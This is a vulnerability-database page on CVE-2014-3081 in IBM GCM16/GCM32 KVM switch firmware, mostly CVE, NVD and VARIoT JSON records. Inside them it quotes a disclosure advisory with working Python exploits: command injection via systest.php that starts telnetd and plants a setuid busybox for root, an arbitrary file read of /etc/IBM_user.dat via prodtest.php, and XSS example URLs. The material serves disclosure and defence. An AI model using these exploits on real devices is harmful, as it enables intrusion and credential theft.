CVE-2014-3081 (GCVE-0-2014-3081)

Vulnerability from cvelistv5 – Published: 2014-08-17 23:00 – Updated: 2024-08-06 10:35

Summary

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.

Severity ?

No CVSS data available.

CWE

Assigner

ibm

References

URL

GSD-2014-3081

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.

Aliases

CVE-2014-3081

Aliases

CVE-2014-3081

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2014-3081",
    "description": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.",
    "id": "GSD-2014-3081",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2014-3081"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2014-3081"
      ],
      "details": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter.",
      "id": "GSD-2014-3081",
      "modified": "2023-12-13T01:22:53.710390Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@us.ibm.com",
        "ID": "CVE-2014-3081",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
          },
          {
            "name": "34132",
            "refsource": "EXPLOIT-DB",
            "url": "http://www.exploit-db.com/exploits/34132/"
          },
          {
            "name": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983",
            "refsource": "CONFIRM",
            "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
          },
          {
            "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
          },
          {
            "name": "ibm-gcm-cve20143081-file-read(93930)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:ibm:global_console_manager_32_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.20.0.22575",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ibm:global_console_manager_16_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.20.0.22575",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "ID": "CVE-2014-3081"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-200"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
            },
            {
              "name": "34132",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.exploit-db.com/exploits/34132/"
            },
            {
              "name": "20140721 IBM GCM16/32 v1.20.0.22575 vulnerabilities",
              "refsource": "FULLDISC",
              "tags": [],
              "url": "http://seclists.org/fulldisclosure/2014/Jul/113"
            },
            {
              "name": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://packetstormsecurity.com/files/127543/IBM-1754-GCM-KVM-Code-Execution-File-Read-XSS.html"
            },
            {
              "name": "ibm-gcm-cve20143081-file-read(93930)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "NONE",
            "baseScore": 6.3,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 6.8,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2017-08-29T01:34Z",
      "publishedDate": "2014-08-17T23:55Z"
    }
  }
}

VAR-201408-0280

Vulnerability from variot - Updated: 2025-04-13 23:05

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. Product description The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.

*1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability:

!/usr/bin/python"""

Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """

from StringIO import StringIO import pycurl import os

sessid = "1111111111" target = "192.168.0.10"

durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;"

storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try: print "[] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[] Done" print "[] Trying telnet..." print "[] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target)

*2. Files can be anywhere on the target. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """

from StringIO import StringIO import pycurl

sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat"

durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file

try: c.perform() c.close() except: print ""

content = storage.getvalue() print content.replace("","").replace("","")

3. Cross site scripting non-persistent CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

Vendor Response: IBM release 1.20.20.23447 firmware

Timeline: 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed

External Information: Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

--

Alejandro Alvarez Bravo alex.a.bravo@gmail.com

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0280",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "global console manager 32",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      },
      {
        "model": "global console manager 16",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      },
      {
        "model": "1754 gcm16 global console manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "1.20.20.23447"
      },
      {
        "model": "1754 gcm32 global console manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "1.20.20.23447"
      },
      {
        "model": "global console manager 16",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      },
      {
        "model": "global console manager 32",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:ibm:global_console_manager_16_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:ibm:global_console_manager_32_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Alejandro Alvarez Bravo",
    "sources": [
      {
        "db": "BID",
        "id": "68779"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2014-3081",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2014-3081",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 6.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.8,
            "id": "VHN-71020",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:S/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-3081",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-3081",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201407-676",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-71020",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. \nAn attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access.  *Product description*\n The IBM 1754 GCM family provides KVM over IP and serial console management\ntechnology in a single appliance. Versions v1.20.0.22575 and prior are\nvulnerables. \n Note that this vulnerability is also present in some DELL and probably\nother vendors of this rebranded KVM. I contacted Dell but no response has\nbeen received. \n\n *1. Remote code execution *\n CVEID: CVE-2014-2085\n Description: Improperly sanitized input may allow a remote authenticated\nattacker to perform remote code execution on the GCM KVM switch. \n PoC of this vulnerability:\n\n#!/usr/bin/python\"\"\"\nExploit for Avocent KVM switch v1.20.0.22575. \nRemote code execution with privilege elevation. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. Default user is \"Admin\" with blank password. \nAfter running exploit, connect using telnet to device with user target\n(pass: target) then do \"/tmp/su -\" to gain root (password \"root\")\nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\nimport os\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\n\ndurl = \"https://\" + target + \"/systest.php?lpres=;%20/usr/\nsbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%\n206755%20/tmp/su%20;\"\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n        print \"[*] Sending GET to \" + target + \" with session id \" + sessid\n+ \"...\"\n        c.perform()\n        c.close()\nexcept:\n        print \"\"\nfinally:\n        print \"[*] Done\"\nprint \"[*] Trying telnet...\"\nprint \"[*] Login as target/target, then do /tmp/su - and enter password\n\\\"root\\\"\"\nos.system(\"telnet \" + target)\n\n*2. Files can be anywhere on the target. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. \nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\nfile = \"/etc/IBM_user.dat\"\n\ndurl = \"https://\" + target + \"/prodtest.php?engage=video_\nbits\u0026display=results\u0026filename=\" + file\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n        c.perform()\n        c.close()\nexcept:\n        print \"\"\n\ncontent = storage.getvalue()\nprint content.replace(\"\u003ctd\u003e\",\"\").replace(\"\u003c/td\u003e\",\"\")\n\n*3. Cross site scripting non-persistent*\n CVEID: CVE-2014-3080\n Description: System is vulnerable to cross-site scripting, caused by\nimproper validation of user-supplied input. A remote attacker could exploit\nthis vulnerability using a specially-crafted URL to execute script in a\nvictim\u0027s Web browser within the security context of the hosting Web site,\nonce the URL is clicked. An attacker could use this vulnerability to steal\nthe victim\u0027s cookie-based authentication credentials. \n\n Examples:\nhttp://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\nhttps://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\n\n*Vendor Response:*\nIBM release 1.20.20.23447 firmware\n\n*Timeline:*\n2014-05-20 - Vendor (PSIRT) notified\n2014-05-21 - Vendor assigns internal ID\n2014-07-16 - Patch Disclosed\n2014-07-17 - Vulnerability disclosed\n\n*External Information:*\nInfo about the vulnerability (spanish):\nhttp://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html\nIBM Security Bulletin:\nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983\n\n-- \n--\nAlejandro Alvarez Bravo\nalex.a.bravo@gmail.com\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "BID",
        "id": "68779"
      },
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-71020",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-3081",
        "trust": 2.9
      },
      {
        "db": "EXPLOIT-DB",
        "id": "34132",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "127543",
        "trust": 1.2
      },
      {
        "db": "BID",
        "id": "68779",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676",
        "trust": 0.7
      },
      {
        "db": "SECUNIA",
        "id": "60260",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "93930",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-71020",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "db": "BID",
        "id": "68779"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "id": "VAR-201408-0280",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2025-04-13T23:05:08.333000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MIGR-5095983",
        "trust": 0.8,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/34132/"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2014/jul/113"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93930"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3081"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3081"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/93930"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/60260"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/68779"
      },
      {
        "trust": 0.1,
        "url": "http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
      },
      {
        "trust": 0.1,
        "url": "https://\""
      },
      {
        "trust": 0.1,
        "url": "http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html"
      },
      {
        "trust": 0.1,
        "url": "https://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2085"
      },
      {
        "trust": 0.1,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3080"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3081"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "db": "BID",
        "id": "68779"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-08-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "date": "2014-07-14T00:00:00",
        "db": "BID",
        "id": "68779"
      },
      {
        "date": "2014-08-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "date": "2014-07-21T19:57:35",
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "date": "2014-07-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "date": "2014-08-17T23:55:06.887000",
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-71020"
      },
      {
        "date": "2014-07-22T06:39:00",
        "db": "BID",
        "id": "68779"
      },
      {
        "date": "2014-08-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-003832"
      },
      {
        "date": "2014-08-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      },
      {
        "date": "2025-04-12T10:46:40.837000",
        "db": "NVD",
        "id": "CVE-2014-3081"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-676"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
